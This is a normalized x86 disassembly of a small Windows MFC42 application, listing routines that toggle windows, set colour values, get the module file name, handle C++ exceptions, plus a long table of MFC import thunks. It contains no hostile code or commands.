add esp 0x4
sub_401460
jmp Ordinal_MFC42_641
sub_401470
retn 0x4
sub_401480
mov eax [ Ordinal_MFC42_4234@IAT ]
retn
sub_401490
mov eax r--data
retn
sub_401500
mov eax [ ecx + 0x20 ]
push 0x0
push eax
call [ EnableWindow@IAT ]
retn
sub_401510
mov eax [ ecx + 0x20 ]
push 0x1
push eax
call [ EnableWindow@IAT ]
retn
sub_401580
mov eax [ Ordinal_MFC42_1825@IAT ]
retn
sub_401590
mov eax r--data
retn
sub_4015a0
mov eax [ Ordinal_MFC42_4238@IAT ]
retn
sub_4015b0
mov eax r--data
retn
sub_4015c0
push esi
mov esi ecx
call Ordinal_MFC42_338
mov [ esi ] r--data
mov eax esi
pop esi
retn
sub_4015e0
push esi
mov esi ecx
call sub_401600
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_401600
mov [ ecx ] r--data
jmp Ordinal_MFC42_652
sub_401750
mov eax [ ecx + 0x54 ]
retn
sub_401760
mov eax [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
lea eax [ eax + edx * 4 ]
mov eax [ ecx + eax * 4 + 0x58 ]
retn 0x8
sub_4017b0
mov [ ecx + 0x54 ] 0xff
retn
sub_4017c0
mov [ ecx + 0x54 ] 0xffff
retn
sub_4017d0
mov [ ecx + 0x54 ] 0xff00
retn
sub_4017e0
mov [ ecx + 0x54 ] 0xffff00
retn
sub_4017f0
mov [ ecx + 0x54 ] 0xff0000
retn
sub_401800
mov [ ecx + 0x54 ] 0xffffff
retn
sub_401930
mov eax [ ecx + 0x48 ]
retn
sub_401940
mov eax [ esp + 0x4 ]
mov [ ecx + 0x48 ] eax
retn 0x4
sub_4019b0
mov eax [ Ordinal_MFC42_1945@IAT ]
retn
sub_4019c0
mov eax r--data
retn
sub_4019d0
mov eax [ Ordinal_MFC42_4273@IAT ]
retn
sub_4019e0
mov eax r--data
retn
sub_401a70
push esi
mov esi ecx
call sub_401a90
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_401a90
mov [ ecx ] r--data
jmp Ordinal_MFC42_813
sub_401aa0
mov eax [ esp + 0x4 ]
push eax
call Ordinal_MFC42_5260
retn 0x4
sub_401d00
mov al [ esp + 0x4 ]
push esi
mov esi ecx
test al 0x1
mov [ esi ] r--data
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_401d20
mov [ ecx ] r--data
retn
sub_401d30
push esi
mov esi ecx
call sub_401d50
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_401da0
call sub_401db0
jmp sub_401dc0
sub_401db0
mov ecx rw-data
jmp sub_401de0
sub_401dc0
push sub_401dd0
call sub_402b1c
pop ecx
retn
sub_401dd0
mov ecx rw-data
jmp sub_402600
sub_401de0
push esi
mov esi ecx
push 0x104
lea eax [ esi + 0x104 ]
push eax
push 0x0
call [ GetModuleFileNameA@IAT ]
mov eax esi
pop esi
retn
sub_402420
mov eax ecx
mov [ eax ] 0x1
mov [ eax + 0x10c ] 0x1
mov [ eax + 0x31c ] 0x0
retn
sub_402520
call sub_402530
jmp sub_402540
sub_402530
mov ecx rw-data
jmp sub_4025f0
sub_402540
push sub_402550
call sub_402b1c
pop ecx
retn
sub_402550
mov ecx rw-data
jmp sub_402600
sub_4025e0
xor eax eax
retn
sub_4025f0
mov eax ecx
retn
sub_402600
retn
Ordinal_MFC42_823
jmp [ Ordinal_MFC42_823@IAT ]
Ordinal_MFC42_5101
jmp [ Ordinal_MFC42_5101@IAT ]
Ordinal_MFC42_2101
jmp [ Ordinal_MFC42_2101@IAT ]
Ordinal_MFC42_2723
jmp [ Ordinal_MFC42_2723@IAT ]
Ordinal_MFC42_2390
jmp [ Ordinal_MFC42_2390@IAT ]
Ordinal_MFC42_3059
jmp [ Ordinal_MFC42_3059@IAT ]
Ordinal_MFC42_5100
jmp [ Ordinal_MFC42_5100@IAT ]
Ordinal_MFC42_5104
jmp [ Ordinal_MFC42_5104@IAT ]
Ordinal_MFC42_4467
jmp [ Ordinal_MFC42_4467@IAT ]
Ordinal_MFC42_4303
jmp [ Ordinal_MFC42_4303@IAT ]
Ordinal_MFC42_3351
jmp [ Ordinal_MFC42_3351@IAT ]
Ordinal_MFC42_5012
jmp [ Ordinal_MFC42_5012@IAT ]
Ordinal_MFC42_976
jmp [ Ordinal_MFC42_976@IAT ]
Ordinal_MFC42_5472
jmp [ Ordinal_MFC42_5472@IAT ]
Ordinal_MFC42_3403
jmp [ Ordinal_MFC42_3403@IAT ]
Ordinal_MFC42_2879
jmp [ Ordinal_MFC42_2879@IAT ]
Ordinal_MFC42_2878
jmp [ Ordinal_MFC42_2878@IAT ]
Ordinal_MFC42_4152
jmp [ Ordinal_MFC42_4152@IAT ]
Ordinal_MFC42_6055
jmp [ Ordinal_MFC42_6055@IAT ]
Ordinal_MFC42_4077
jmp [ Ordinal_MFC42_4077@IAT ]
Ordinal_MFC42_1776
jmp [ Ordinal_MFC42_1776@IAT ]
Ordinal_MFC42_4407
jmp [ Ordinal_MFC42_4407@IAT ]
Ordinal_MFC42_5237
jmp [ Ordinal_MFC42_5237@IAT ]
Ordinal_MFC42_2382
jmp [ Ordinal_MFC42_2382@IAT ]
Ordinal_MFC42_5163
jmp [ Ordinal_MFC42_5163@IAT ]
Ordinal_MFC42_6374
jmp [ Ordinal_MFC42_6374@IAT ]
Ordinal_MFC42_4353
jmp [ Ordinal_MFC42_4353@IAT ]
Ordinal_MFC42_5283
jmp [ Ordinal_MFC42_5283@IAT ]
Ordinal_MFC42_2649
jmp [ Ordinal_MFC42_2649@IAT ]
Ordinal_MFC42_1665
jmp [ Ordinal_MFC42_1665@IAT ]
Ordinal_MFC42_3798
jmp [ Ordinal_MFC42_3798@IAT ]
Ordinal_MFC42_4837
jmp [ Ordinal_MFC42_4837@IAT ]
Ordinal_MFC42_4436
jmp [ Ordinal_MFC42_4436@IAT ]
Ordinal_MFC42_2648
jmp [ Ordinal_MFC42_2648@IAT ]
Ordinal_MFC42_2055
jmp [ Ordinal_MFC42_2055@IAT ]
Ordinal_MFC42_6376
jmp [ Ordinal_MFC42_6376@IAT ]
Ordinal_MFC42_3749
jmp [ Ordinal_MFC42_3749@IAT ]
Ordinal_MFC42_5065
jmp [ Ordinal_MFC42_5065@IAT ]
Ordinal_MFC42_1727
jmp [ Ordinal_MFC42_1727@IAT ]
Ordinal_MFC42_2445
jmp [ Ordinal_MFC42_2445@IAT ]
Ordinal_MFC42_2124
jmp [ Ordinal_MFC42_2124@IAT ]
Ordinal_MFC42_5277
jmp [ Ordinal_MFC42_5277@IAT ]
Ordinal_MFC42_2982
jmp [ Ordinal_MFC42_2982@IAT ]
Ordinal_MFC42_3147
jmp [ Ordinal_MFC42_3147@IAT ]
Ordinal_MFC42_3259
jmp [ Ordinal_MFC42_3259@IAT ]
Ordinal_MFC42_4465
jmp [ Ordinal_MFC42_4465@IAT ]
Ordinal_MFC42_3136
jmp [ Ordinal_MFC42_3136@IAT ]
Ordinal_MFC42_3262
jmp [ Ordinal_MFC42_3262@IAT ]
Ordinal_MFC42_2985
jmp [ Ordinal_MFC42_2985@IAT ]
Ordinal_MFC42_3081
jmp [ Ordinal_MFC42_3081@IAT ]
Ordinal_MFC42_2976
jmp [ Ordinal_MFC42_2976@IAT ]
Ordinal_MFC42_3830
jmp [ Ordinal_MFC42_3830@IAT ]
Ordinal_MFC42_3831
jmp [ Ordinal_MFC42_3831@IAT ]
Ordinal_MFC42_3825
jmp [ Ordinal_MFC42_3825@IAT ]
Ordinal_MFC42_3079
jmp [ Ordinal_MFC42_3079@IAT ]
Ordinal_MFC42_4080
jmp [ Ordinal_MFC42_4080@IAT ]
Ordinal_MFC42_4627
jmp [ Ordinal_MFC42_4627@IAT ]
Ordinal_MFC42_4427
jmp [ Ordinal_MFC42_4427@IAT ]
Ordinal_MFC42_401
jmp [ Ordinal_MFC42_401@IAT ]
Ordinal_MFC42_825
jmp [ Ordinal_MFC42_825@IAT ]
Ordinal_MFC42_674
jmp [ Ordinal_MFC42_674@IAT ]
Ordinal_MFC42_5254
jmp [ Ordinal_MFC42_5254@IAT ]
Ordinal_MFC42_3869
jmp [ Ordinal_MFC42_3869@IAT ]
Ordinal_MFC42_2127
jmp [ Ordinal_MFC42_2127@IAT ]
Ordinal_MFC42_2391
jmp [ Ordinal_MFC42_2391@IAT ]
Ordinal_MFC42_5102
jmp [ Ordinal_MFC42_5102@IAT ]
Ordinal_MFC42_5105
jmp [ Ordinal_MFC42_5105@IAT ]
Ordinal_MFC42_4468
jmp [ Ordinal_MFC42_4468@IAT ]
Ordinal_MFC42_3350
jmp [ Ordinal_MFC42_3350@IAT ]
Ordinal_MFC42_975
jmp [ Ordinal_MFC42_975@IAT ]
Ordinal_MFC42_2880
jmp [ Ordinal_MFC42_2880@IAT ]
Ordinal_MFC42_4153
jmp [ Ordinal_MFC42_4153@IAT ]
Ordinal_MFC42_2383
jmp [ Ordinal_MFC42_2383@IAT ]
Ordinal_MFC42_5284
jmp [ Ordinal_MFC42_5284@IAT ]
Ordinal_MFC42_4437
jmp [ Ordinal_MFC42_4437@IAT ]
Ordinal_MFC42_2446
jmp [ Ordinal_MFC42_2446@IAT ]
Ordinal_MFC42_4428
jmp [ Ordinal_MFC42_4428@IAT ]
Ordinal_MFC42_402
jmp [ Ordinal_MFC42_402@IAT ]
Ordinal_MFC42_5255
jmp [ Ordinal_MFC42_5255@IAT ]
Ordinal_MFC42_4612
jmp [ Ordinal_MFC42_4612@IAT ]
Ordinal_MFC42_4610
jmp [ Ordinal_MFC42_4610@IAT ]
Ordinal_MFC42_6375
jmp [ Ordinal_MFC42_6375@IAT ]
Ordinal_MFC42_4486
jmp [ Ordinal_MFC42_4486@IAT ]
Ordinal_MFC42_2554
jmp [ Ordinal_MFC42_2554@IAT ]
Ordinal_MFC42_2512
jmp [ Ordinal_MFC42_2512@IAT ]
Ordinal_MFC42_5731
jmp [ Ordinal_MFC42_5731@IAT ]
Ordinal_MFC42_3922
jmp [ Ordinal_MFC42_3922@IAT ]
Ordinal_MFC42_1089
jmp [ Ordinal_MFC42_1089@IAT ]
Ordinal_MFC42_5199
jmp [ Ordinal_MFC42_5199@IAT ]
Ordinal_MFC42_2396
jmp [ Ordinal_MFC42_2396@IAT ]
Ordinal_MFC42_3346
jmp [ Ordinal_MFC42_3346@IAT ]
Ordinal_MFC42_5300
jmp [ Ordinal_MFC42_5300@IAT ]
Ordinal_MFC42_5302
jmp [ Ordinal_MFC42_5302@IAT ]
Ordinal_MFC42_2725
jmp [ Ordinal_MFC42_2725@IAT ]
Ordinal_MFC42_4079
jmp [ Ordinal_MFC42_4079@IAT ]
Ordinal_MFC42_4698
jmp [ Ordinal_MFC42_4698@IAT ]
Ordinal_MFC42_5307
jmp [ Ordinal_MFC42_5307@IAT ]
Ordinal_MFC42_5289
jmp [ Ordinal_MFC42_5289@IAT ]
Ordinal_MFC42_5714
jmp [ Ordinal_MFC42_5714@IAT ]
Ordinal_MFC42_4622
jmp [ Ordinal_MFC42_4622@IAT ]
Ordinal_MFC42_4424
jmp [ Ordinal_MFC42_4424@IAT ]
Ordinal_MFC42_3738
jmp [ Ordinal_MFC42_3738@IAT ]
Ordinal_MFC42_561
jmp [ Ordinal_MFC42_561@IAT ]
Ordinal_MFC42_815
jmp [ Ordinal_MFC42_815@IAT ]
Ordinal_MFC42_6215
jmp [ Ordinal_MFC42_6215@IAT ]
Ordinal_MFC42_617
jmp [ Ordinal_MFC42_617@IAT ]
Ordinal_MFC42_5301
jmp [ Ordinal_MFC42_5301@IAT ]
Ordinal_MFC42_5214
jmp [ Ordinal_MFC42_5214@IAT ]
Ordinal_MFC42_296
jmp [ Ordinal_MFC42_296@IAT ]
Ordinal_MFC42_5503
jmp [ Ordinal_MFC42_5503@IAT ]
Ordinal_MFC42_2635
jmp [ Ordinal_MFC42_2635@IAT ]
Ordinal_MFC42_2558
jmp [ Ordinal_MFC42_2558@IAT ]
Ordinal_MFC42_986
jmp [ Ordinal_MFC42_986@IAT ]
Ordinal_MFC42_411
jmp [ Ordinal_MFC42_411@IAT ]
Ordinal_MFC42_4159
jmp [ Ordinal_MFC42_4159@IAT ]
Ordinal_MFC42_6117
jmp [ Ordinal_MFC42_6117@IAT ]
Ordinal_MFC42_5265
jmp [ Ordinal_MFC42_5265@IAT ]
Ordinal_MFC42_4376
jmp [ Ordinal_MFC42_4376@IAT ]
Ordinal_MFC42_4853
jmp [ Ordinal_MFC42_4853@IAT ]
Ordinal_MFC42_4998
jmp [ Ordinal_MFC42_4998@IAT ]
Ordinal_MFC42_4710
jmp [ Ordinal_MFC42_4710@IAT ]
Ordinal_MFC42_2514
jmp [ Ordinal_MFC42_2514@IAT ]
Ordinal_MFC42_6052
jmp [ Ordinal_MFC42_6052@IAT ]
Ordinal_MFC42_4078
jmp [ Ordinal_MFC42_4078@IAT ]
Ordinal_MFC42_1775
jmp [ Ordinal_MFC42_1775@IAT ]
Ordinal_MFC42_5241
jmp [ Ordinal_MFC42_5241@IAT ]
Ordinal_MFC42_2385
jmp [ Ordinal_MFC42_2385@IAT ]
Ordinal_MFC42_5280
jmp [ Ordinal_MFC42_5280@IAT ]
Ordinal_MFC42_4441
jmp [ Ordinal_MFC42_4441@IAT ]
Ordinal_MFC42_5261
jmp [ Ordinal_MFC42_5261@IAT ]
Ordinal_MFC42_4425
jmp [ Ordinal_MFC42_4425@IAT ]
Ordinal_MFC42_3597
jmp [ Ordinal_MFC42_3597@IAT ]
Ordinal_MFC42_324
jmp [ Ordinal_MFC42_324@IAT ]
Ordinal_MFC42_641
jmp [ Ordinal_MFC42_641@IAT ]
Ordinal_MFC42_4696
jmp [ Ordinal_MFC42_4696@IAT ]
Ordinal_MFC42_3058
jmp [ Ordinal_MFC42_3058@IAT ]
Ordinal_MFC42_3065
jmp [ Ordinal_MFC42_3065@IAT ]
Ordinal_MFC42_6336
jmp [ Ordinal_MFC42_6336@IAT ]
Ordinal_MFC42_2510
jmp [ Ordinal_MFC42_2510@IAT ]
Ordinal_MFC42_2542
jmp [ Ordinal_MFC42_2542@IAT ]
Ordinal_MFC42_5243
jmp [ Ordinal_MFC42_5243@IAT ]
Ordinal_MFC42_5740
jmp [ Ordinal_MFC42_5740@IAT ]
Ordinal_MFC42_1746
jmp [ Ordinal_MFC42_1746@IAT ]
Ordinal_MFC42_5577
jmp [ Ordinal_MFC42_5577@IAT ]
Ordinal_MFC42_3172
jmp [ Ordinal_MFC42_3172@IAT ]
Ordinal_MFC42_5653
jmp [ Ordinal_MFC42_5653@IAT ]
Ordinal_MFC42_4420
jmp [ Ordinal_MFC42_4420@IAT ]
Ordinal_MFC42_4953
jmp [ Ordinal_MFC42_4953@IAT ]
Ordinal_MFC42_4858
jmp [ Ordinal_MFC42_4858@IAT ]
Ordinal_MFC42_2399
jmp [ Ordinal_MFC42_2399@IAT ]
Ordinal_MFC42_4387
jmp [ Ordinal_MFC42_4387@IAT ]
Ordinal_MFC42_3454
jmp [ Ordinal_MFC42_3454@IAT ]
Ordinal_MFC42_3198
jmp [ Ordinal_MFC42_3198@IAT ]
Ordinal_MFC42_6080
jmp [ Ordinal_MFC42_6080@IAT ]
Ordinal_MFC42_6175
jmp [ Ordinal_MFC42_6175@IAT ]
Ordinal_MFC42_4623
jmp [ Ordinal_MFC42_4623@IAT ]
Ordinal_MFC42_4426
jmp [ Ordinal_MFC42_4426@IAT ]
Ordinal_MFC42_338
jmp [ Ordinal_MFC42_338@IAT ]
Ordinal_MFC42_652
jmp [ Ordinal_MFC42_652@IAT ]
Ordinal_MFC42_4823
jmp [ Ordinal_MFC42_4823@IAT ]
Ordinal_MFC42_2740
jmp [ Ordinal_MFC42_2740@IAT ]
Ordinal_MFC42_2801
jmp [ Ordinal_MFC42_2801@IAT ]
Ordinal_MFC42_6329
jmp [ Ordinal_MFC42_6329@IAT ]
Ordinal_MFC42_4589
jmp [ Ordinal_MFC42_4589@IAT ]
Ordinal_MFC42_4588
jmp [ Ordinal_MFC42_4588@IAT ]
Ordinal_MFC42_4899
jmp [ Ordinal_MFC42_4899@IAT ]
Ordinal_MFC42_4370
jmp [ Ordinal_MFC42_4370@IAT ]
Ordinal_MFC42_4892
jmp [ Ordinal_MFC42_4892@IAT ]
Ordinal_MFC42_5076
jmp [ Ordinal_MFC42_5076@IAT ]
Ordinal_MFC42_4341
jmp [ Ordinal_MFC42_4341@IAT ]
Ordinal_MFC42_4349
jmp [ Ordinal_MFC42_4349@IAT ]
Ordinal_MFC42_4723
jmp [ Ordinal_MFC42_4723@IAT ]
Ordinal_MFC42_4890
jmp [ Ordinal_MFC42_4890@IAT ]
Ordinal_MFC42_4531
jmp [ Ordinal_MFC42_4531@IAT ]
Ordinal_MFC42_4545
jmp [ Ordinal_MFC42_4545@IAT ]
Ordinal_MFC42_4543
jmp [ Ordinal_MFC42_4543@IAT ]
Ordinal_MFC42_4526
jmp [ Ordinal_MFC42_4526@IAT ]
Ordinal_MFC42_4529
jmp [ Ordinal_MFC42_4529@IAT ]
Ordinal_MFC42_4524
jmp [ Ordinal_MFC42_4524@IAT ]
Ordinal_MFC42_4964
jmp [ Ordinal_MFC42_4964@IAT ]
Ordinal_MFC42_4961
jmp [ Ordinal_MFC42_4961@IAT ]
Ordinal_MFC42_4108
jmp [ Ordinal_MFC42_4108@IAT ]
Ordinal_MFC42_5240
jmp [ Ordinal_MFC42_5240@IAT ]
Ordinal_MFC42_5290
jmp [ Ordinal_MFC42_5290@IAT ]
Ordinal_MFC42_3748
jmp [ Ordinal_MFC42_3748@IAT ]
Ordinal_MFC42_1726
jmp [ Ordinal_MFC42_1726@IAT ]
Ordinal_MFC42_4432
jmp [ Ordinal_MFC42_4432@IAT ]
Ordinal_MFC42_813
jmp [ Ordinal_MFC42_813@IAT ]
Ordinal_MFC42_560
jmp [ Ordinal_MFC42_560@IAT ]
Ordinal_MFC42_5260
jmp [ Ordinal_MFC42_5260@IAT ]
Ordinal_MFC42_3663
jmp [ Ordinal_MFC42_3663@IAT ]
Ordinal_MFC42_3626
jmp [ Ordinal_MFC42_3626@IAT ]
Ordinal_MFC42_4133
jmp [ Ordinal_MFC42_4133@IAT ]
Ordinal_MFC42_4297
jmp [ Ordinal_MFC42_4297@IAT ]
Ordinal_MFC42_2414
jmp [ Ordinal_MFC42_2414@IAT ]
Ordinal_MFC42_283
jmp [ Ordinal_MFC42_283@IAT ]
Ordinal_MFC42_613
jmp [ Ordinal_MFC42_613@IAT ]
Ordinal_MFC42_6021
jmp [ Ordinal_MFC42_6021@IAT ]
Ordinal_MFC42_289
jmp [ Ordinal_MFC42_289@IAT ]
Ordinal_MFC42_2379
jmp [ Ordinal_MFC42_2379@IAT ]
Ordinal_MFC42_800
jmp [ Ordinal_MFC42_800@IAT ]
Ordinal_MFC42_858
jmp [ Ordinal_MFC42_858@IAT ]
Ordinal_MFC42_924
jmp [ Ordinal_MFC42_924@IAT ]
Ordinal_MFC42_860
jmp [ Ordinal_MFC42_860@IAT ]
Ordinal_MFC42_540
jmp [ Ordinal_MFC42_540@IAT ]
__CxxFrameHandler
jmp [ __CxxFrameHandler@IAT ]
sub_402af0
cmp [ rw-data ] 0xffffffff
jne r-xdata
push rw-data
push rw-data
push [ esp + 0xc ]
call __dllonexit
add esp 0xc
retn
push [ esp + 0x4 ]
call [ _onexit@IAT ]
pop ecx
retn
sub_402b1c
push [ esp + 0x4 ]
call sub_402af0
neg eax
sbb eax eax
pop ecx
neg eax
dec eax
retn
__dllonexit
jmp [ __dllonexit@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_402c9e
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_402cb0
xor eax eax
retn
sub_402cb3
retn
_except_handler3
jmp [ _except_handler3@IAT ]
_controlfp
jmp [ _controlfp@IAT ]
sub_402cc0
push [ esp + 0x10 ]
push [ esp + 0x10 ]
push [ esp + 0x10 ]
push [ esp + 0x10 ]
call Ordinal_MFC42_1576
retn 0x10
j_sub_402d06
jmp sub_402d06
sub_402d06
push 0x600
push 0x0
call sub_402cd8
mov [ rw-data ] al
retn
Ordinal_MFC42_1576
jmp [ Ordinal_MFC42_1576@IAT ]
Ordinal_MFC42_1168
jmp [ Ordinal_MFC42_1168@IAT ]
sub_402d30
mov eax [ ebp - 0x10 ]
push eax
call sub_401120
retn
sub_402d3a
mov eax r--data
jmp __CxxFrameHandler
sub_402d50
mov eax [ ebp - 0x34 ]
push eax
call sub_401120
retn
sub_402d5a
mov eax [ ebp - 0x34 ]
push eax
call sub_401120
retn
sub_402d64
lea ecx [ ebp - 0x30 ]
jmp Ordinal_MFC42_617
sub_402d6c
mov eax r--data
jmp __CxxFrameHandler
sub_402d80
lea ecx [ ebp - 0x6c ]
jmp sub_401460
sub_402d88
mov eax r--data
jmp __CxxFrameHandler
sub_402da0
mov eax [ ebp - 0x10 ]
push eax
call sub_401120
retn
sub_402daa
mov eax r--data
jmp __CxxFrameHandler
sub_402dc0
mov eax [ ebp - 0x10 ]
push eax
call sub_401120
retn
sub_402dca
mov eax r--data
jmp __CxxFrameHandler
sub_402de0
mov ecx [ ebp - 0x744 ]
jmp Ordinal_MFC42_813
sub_402deb
lea ecx [ ebp - 0x740 ]
jmp sub_402600
sub_402df6
mov eax r--data
jmp __CxxFrameHandler
sub_402e00
lea ecx [ ebp - 0x24 ]
jmp sub_401d20
sub_402e08
mov eax r--data
jmp __CxxFrameHandler
sub_402e20
lea ecx [ ebp - 0x20 ]
jmp Ordinal_MFC42_613
sub_402e28
mov eax r--data
jmp __CxxFrameHandler
sub_402e40
mov ecx [ ebp - 0x10 ]
jmp sub_401d20
sub_402e48
mov eax r--data
jmp __CxxFrameHandler
sub_402e60
lea ecx [ ebp - 0x120 ]
jmp Ordinal_MFC42_800
sub_402e6b
lea ecx [ ebp - 0x11c ]
jmp Ordinal_MFC42_800
sub_402e76
lea ecx [ ebp - 0x118 ]
jmp Ordinal_MFC42_800
sub_402e81
lea ecx [ ebp - 0x128 ]
jmp Ordinal_MFC42_800
sub_402e8c
lea ecx [ ebp - 0x114 ]
jmp Ordinal_MFC42_800
sub_402e97
lea ecx [ ebp - 0x118 ]
jmp Ordinal_MFC42_800
sub_402ea2
mov eax r--data
jmp __CxxFrameHandler
sub_402eb0
lea ecx [ ebp - 0x18 ]
jmp Ordinal_MFC42_800
sub_402eb8
lea ecx [ ebp - 0x10 ]
jmp Ordinal_MFC42_800
sub_402ec0
mov eax r--data
jmp __CxxFrameHandler
sub_402ed0
mov eax [ ebp - 0x14 ]
push eax
call Ordinal_MFC42_825
pop ecx
retn
sub_402edb
mov eax r--data
jmp __CxxFrameHandler
